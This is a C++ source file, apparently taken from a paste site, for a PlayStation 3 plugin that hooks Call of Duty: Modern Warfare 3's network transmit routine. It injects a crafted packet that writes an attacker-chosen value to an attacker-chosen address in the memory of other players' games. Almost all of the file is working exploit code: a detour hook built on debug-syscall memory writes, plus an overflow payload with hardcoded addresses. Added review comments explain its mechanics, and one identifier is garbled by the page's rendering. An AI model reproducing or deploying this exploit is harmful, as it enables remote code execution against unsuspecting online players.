mw3 rce ps3
  1. #include <cellstatus.h>
  2.  
  3. #include <sys/prx.h>
  4.  
  5. #include <time.h>
  6.  
  7. #include <fastmath.h>
  8.  
  9. #include <ppu_intrinsics.h>
  10.  
  11. #include <stdarg.h>
  12.  
  13. #include <stddef.h>
  14.  
  15.  
  16.  
  17. #include <sys/prx.h>
  18.  
  19. #include <sys/syscall.h>
  20.  
  21. #include <sys/ppu_thread.h>
  22.  
  23. #include <sys/sys_time.h>
  24.  
  25. #include <sys/time_util.h>
  26.  
  27. #include <sys/timer.h>
  28.  
  29. #include <sys/types.h>
  30.  
  31.  
  32.  
  33. #include <sys/socket.h>
  34.  
  35. #include <netinet\in.h>
  36.  
  37. #include <arpa\inet.h>
  38.  
  39. #include <netdb.h>
  40.  
  41. #include <cell\pad\libpad.h>
  42.  
  43. #include <sys/process.h>
  44.  
  45. #include <sys/memory.h>
  46.  
  47.  
  48.  
// PRX module descriptor: module name MW3_RCE, attribute 0, version 1.1
// (argument order as documented for SYS_MODULE_INFO in sys/prx.h — confirm).
SYS_MODULE_INFO( MW3_RCE, 0, 1, 1);

// Entry point run when the PRX is loaded (installs the hook, see below).
SYS_MODULE_START( _MW3_RCE_prx_entry );

// Handler run when the PRX is stopped (restores the patched bytes, see below).
SYS_MODULE_STOP(_MW3_RCE_prx_stop);
  54.  
  55.  
  56.  
  57. /*
  58.  
  59. Credits:
  60.  
  61. Gamer7112 for bringing my attention to this
  62.  
  63. momo5502 for originally making a post showing this off.
  64.  
  65. Sabotage for finding the exploit and creating the PoC
  66.  
  67. */
  68.  
  69.  
  70.  
// Saved copy of the first 0x10 bytes (4 instructions) at the hooked address 0xDE810.
// Filled by _MW3_RCE_prx_entry before the hook is written, written back by
// _MW3_RCE_prx_stop.
int RestoreHook[4];

// The module uses an SDK-provided _sys_memset in place of libc memset.
// NOTE(review): the second parameter is declared void* instead of int, so only a
// null-pointer constant such as the literal 0 used in this file converts implicitly;
// a call like memset(p, 1, n) would fail to compile against this prototype.
extern "C" {
    void *_sys_memset(void * ptr, void* value, size_t num);
}

#define memset          _sys_memset
  86.  
  87.  
  88.  
// Mirror of the message-buffer struct that the game's own MSG_Init / MSG_WriteData
// (called by address below) operate on. Field order, types and count are therefore the
// game's ABI and must not be rearranged. Only `data` and `cursize` are read directly in
// this file (CL_Netchan_Transmit); the other fields are written by the game routines.
struct msg_t
{
    int overflowed;
    int readOnly;
    char* data;         // backing buffer handed to MSG_Init
    char* splitData;
    int maxsize;
    int cursize;        // bytes written so far; read by CL_Netchan_Transmit
    int splitSize;
    int readcount;
    int bit;
    int lastEntityRef;
    int targetLocalNetID;
    int useZlib;
};
  118.  
  119.  
  120.  
// TOC base of the target game executable; paired with each code address below to form
// a function descriptor. Presumably specific to one MW3 PS3 build — confirm before use.
#define TOC 0x72DCE8

// PPC64 ELF function descriptor (OPD): entry address followed by the TOC pointer.
// A C++ function pointer on this platform points at one of these, which is why
// `&MSG_*_t` below can be cast to a function pointer and why DetourFunction reads the
// first word of a function pointer to obtain the code address.
struct opd_s_o
{
    unsigned int sub;   // entry (code) address
    unsigned int toc;   // TOC pointer used while that code runs
};
  134.  
  135.  
  136.  
// Hand-built descriptors for three routines inside the game executable. The code
// addresses are build-specific constants; nothing here validates them.

// MSG_WriteBitsCompress(trainHuffman, from, to, size): the caller in this file passes
// the same pointer as `from` and `to` and uses the return value as the compressed size.
opd_s_o MSG_WriteBitsCompress_t = { 0x001FBFC8, TOC };
int(*MSG_WriteBitsCompress)(bool trainHuffman, const char *from, char *to, int size) = (int(*)(bool trainHuffman, const char *from, char *to, int size))&MSG_WriteBitsCompress_t;

// MSG_Init(msg, buffer, size): binds a caller-owned buffer of `size` bytes to `msg`.
opd_s_o MSG_Init_t = { 0x001FBC78, TOC };
int(*MSG_Init)(msg_t* msg, char* buffer, int size) = (int(*)(msg_t* msg, char* buffer, int size))&MSG_Init_t;

// MSG_WriteData(msg, data, size): appends `size` bytes to the message.
opd_s_o MSG_WriteData_t = { 0x001FC128, TOC };
int(*MSG_WriteData)(msg_t* msg, unsigned char* data, int size) = (int(*)(msg_t* msg, unsigned char* data, int size))&MSG_WriteData_t;
  152.  
  153.  
  154.  
// Trampoline placeholder. DetourFunction (called from _MW3_RCE_prx_entry) overwrites
// the first 0x20 bytes at this function's entry address with: load address+0x10 into
// r11/ctr, the 4 original instructions displaced from 0xDE810, then bctr. After that
// patch a call here behaves like the unhooked CL_Netchan_Transmit.
// NOTE(review): the body as written has no return statement for a non-void function;
// presumably it never executes in this form once patched. The 0x20-byte write also
// assumes the compiled function occupies at least that much code — confirm.
int CL_Netchan_TransmitStub(...)
{
    __asm("li %r3, 0x332;");
}
  162.  
  163.  
  164.  
  165.  
  166.  
  167.  
  168.  
// Hook body installed over the game's transmit routine at 0xDE810 (see
// _MW3_RCE_prx_entry). Every call is normally forwarded unchanged through the
// trampoline; when the int at 0x10055000 equals 2 the outgoing buffer is replaced by a
// locally constructed message and the flag is cleared so the next call forwards again.
//
// NOTE(review): 0x10055000 / 0x10055010 / 0x10055014 form a fixed control block that
// some writer outside this file must populate; nothing here validates those values.
int CL_Netchan_Transmit(int netchan, unsigned char* buffer, int size, int unk)
{
    if (*(int*)0x10055000 == 2)
    {
        msg_t message;
        memset(&message, 0, sizeof(msg_t));

        // Two 4 KiB scratch buffers on the stack (about 8 KiB of frame in total).
        char MessageBuffer[0x1000];
        char DataToBeSent[0x1000];
        memset(MessageBuffer, 0, 0x1000);
        memset(DataToBeSent, 0, 0x1000);

        MSG_Init(&message, MessageBuffer, 0x1000);
        // The first 9 bytes of the caller's buffer are kept verbatim.
        MSG_WriteData(&message, buffer, 0x9);

        // 0x8DC bytes of DataToBeSent are used below; this memset is redundant with the
        // full-buffer clear above.
        memset(DataToBeSent, 0, 0x840 + 0x9C);

        // NOTE(review): the identifier on this line and the one at offset 0x820 is
        // garbled by the paste site's rendering; from context it is the DataToBeSent
        // buffer declared above.
        int* a = (int*)&Awesome faceataToBeSent[0x808];

        // Two words copied from the control block (original comments retained).
        a[1] = *(int*)(0x10055014); //value
        a[3] = *(int*)(0x10055010); //address

        int* r = (int*)&Awesome faceataToBeSent[0x820];

        // Fixed constants at word offsets 3, 35 and 36 of the block starting at 0x820.
        // They are build-specific; their meaning is not derivable from this file.
        r[3] = 0xCAD8C;

        r[35] = 0x1F6E58;
        r[36] = 0xAAAAAAAA;

        MSG_WriteData(&message, (unsigned char*)DataToBeSent, 0x840 + 0x9C);

        // Compress in place (from == to) everything after the 9-byte prefix; the prefix
        // itself stays uncompressed. The return value is treated as the new body size.
        int CompressedSize = MSG_WriteBitsCompress(0, &message.data[0x9], &message.data[0x9], message.cursize - 0x9);

        // Clear the trigger so subsequent calls take the pass-through path.
        *(int*)0x10055000 = 0;

        return CL_Netchan_TransmitStub(netchan, (unsigned char*)message.data, CompressedSize, unk);
    }

    // Pass-through: the trampoline runs the displaced instructions and continues
    // at 0xDE810 + 0x10.
    return CL_Netchan_TransmitStub(netchan, buffer, size, unk);
}
  250.  
  251.  
  252.  
  253.  
  254.  
  255.  
  256.  
// Reads `size` bytes of the current process's memory at `address` into `data` through
// PS3 syscall 904 (arguments: pid, address, size, destination). The return value is
// whatever the syscall left in the result register, via return_to_user_prog.
// NOTE(review): return_to_user_prog reads that register directly, so nothing may be
// inserted between the syscall and it. Presumably this syscall is only exposed on
// firmware that enables the dbg syscalls — confirm for the target environment.
int sys_dbg_read_process_memory(uint64_t address, void* data, size_t size) {
    system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
    return_to_user_prog(int);
}
  264.  
  265.  
  266.  
// Writes `size` bytes from `data` into the current process's memory at `address`
// through PS3 syscall 905 (arguments: pid, address, size, source). Because callers use
// this to patch code, the data cache block at `address` is stored back (dcbst) and a
// sync/isync barrier follows so the new instructions are fetched rather than stale ones.
// NOTE(review): only the single cache block containing `address` is stored back; a write
// that crosses a block boundary is not fully covered — confirm the PPU line size.
// NOTE(review): the three intrinsics sit between the syscall and return_to_user_prog;
// this relies on them not clobbering the result register — presumably true for cache
// and barrier instructions, but worth confirming.
int sys_dbg_write_process_memory(uint64_t address, void* data, size_t size) {
    system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
    __dcbst((void*)address);
    __sync();
    __isync();
    return_to_user_prog(int32_t);
}
  280.  
  281.  
  282.  
// Redirects the function at `address` to hookFunc by overwriting its first four
// instructions with an absolute branch, and optionally builds a 0x20-byte trampoline
// in stubFunc that replays the four displaced instructions and then branches to
// address + 0x10. hookFunc/stubFunc are C++ function pointers, i.e. pointers to
// opd_s_o descriptors, so the code address is the descriptor's first word.
//
// Instruction encodings used: 0x3D600000 = lis r11,hi; 0x396B0000 = addi r11,r11,lo;
// 0x7D6903A6 = mtctr r11; 0x4E800420 = bctr. The "+1" on the high half compensates
// for addi sign-extending a low half whose bit 15 is set.
//
// NOTE(review): the displaced instructions are assumed to be position-independent
// (no PC-relative branches among them); nothing here checks that. The results of the
// dbg read/write calls are also not checked — if the read fails, StubData[3..6] are
// written out uninitialized.
void DetourFunction(int address, void(*hookFunc), void(*stubFunc)) {
    int StubData[8], FuncData[4];

    // First word of each function descriptor is the entry address; 0 when absent.
    int hook_address = hookFunc != NULL ? *(int*)hookFunc : 0;
    int stub_address = stubFunc != NULL ? *(int*)stubFunc : 0;

    if (stub_address) {
        // Continue just past the four instructions the hook replaces.
        int branchAddr = address + 0x10;
        StubData[0] = 0x3D600000 + ((branchAddr >> 16) & 0xFFFF) + (branchAddr & 0x8000 ? 1 : 0);
        StubData[1] = 0x396B0000 + (branchAddr & 0xFFFF);
        StubData[2] = 0x7D6903A6;
        StubData[7] = 0x4E800420;
        // StubData[3..6]: the original 0x10 bytes at `address`.
        sys_dbg_read_process_memory(address, &StubData[3], 0x10);
        sys_dbg_write_process_memory(stub_address, StubData, 0x20);
    }

    if (hook_address) {
        // lis/addi/mtctr/bctr to hook_address, written over the start of `address`.
        FuncData[0] = 0x3D600000 + ((hook_address >> 16) & 0xFFFF) + (hook_address & 0x8000 ? 1 : 0);
        FuncData[1] = 0x396B0000 + (hook_address & 0xFFFF);
        FuncData[2] = 0x7D6903A6;
        FuncData[3] = 0x4E800420;
        sys_dbg_write_process_memory(address, FuncData, 0x10);
    }
}
  330.  
  331.  
  332.  
  333.  
  334.  
  335.  
  336.  
// Module start handler. First copies the 0x10 bytes at 0xDE810 into RestoreHook
// (the dbg write syscall is used here as a memcpy: destination RestoreHook, source
// 0xDE810), then installs the hook with CL_Netchan_TransmitStub as the trampoline.
// NOTE(review): 0xDE810 is a code address in one specific game build; on any other
// build this patches unrelated bytes. The copy's result is not checked before the hook
// is written.
extern "C" int _MW3_RCE_prx_entry(void)
{
    sys_dbg_write_process_memory((uint64_t)RestoreHook, (void*)0xDE810, 0x10);

    DetourFunction(0xDE810, CL_Netchan_Transmit, CL_Netchan_TransmitStub);

    return SYS_PRX_RESIDENT;
}
  352.  
  353.  
  354.  
  355.  
  356.  
// Module stop handler: writes the saved 0x10 bytes back over 0xDE810, undoing the hook.
// The trampoline written into CL_Netchan_TransmitStub lives in this module's own image
// and presumably goes away with it; nothing else is restored.
// NOTE(review): SYS_PRX_RESIDENT is the start-handler status; a stop handler
// conventionally returns SYS_PRX_STOP_OK — confirm against sys/prx.h (the numeric
// values may coincide, which would make this harmless in practice).
extern "C" int _MW3_RCE_prx_stop(void)
{
    sys_dbg_write_process_memory((uint64_t)0xDE810, (void*)RestoreHook, 0x10);

    return SYS_PRX_RESIDENT;
}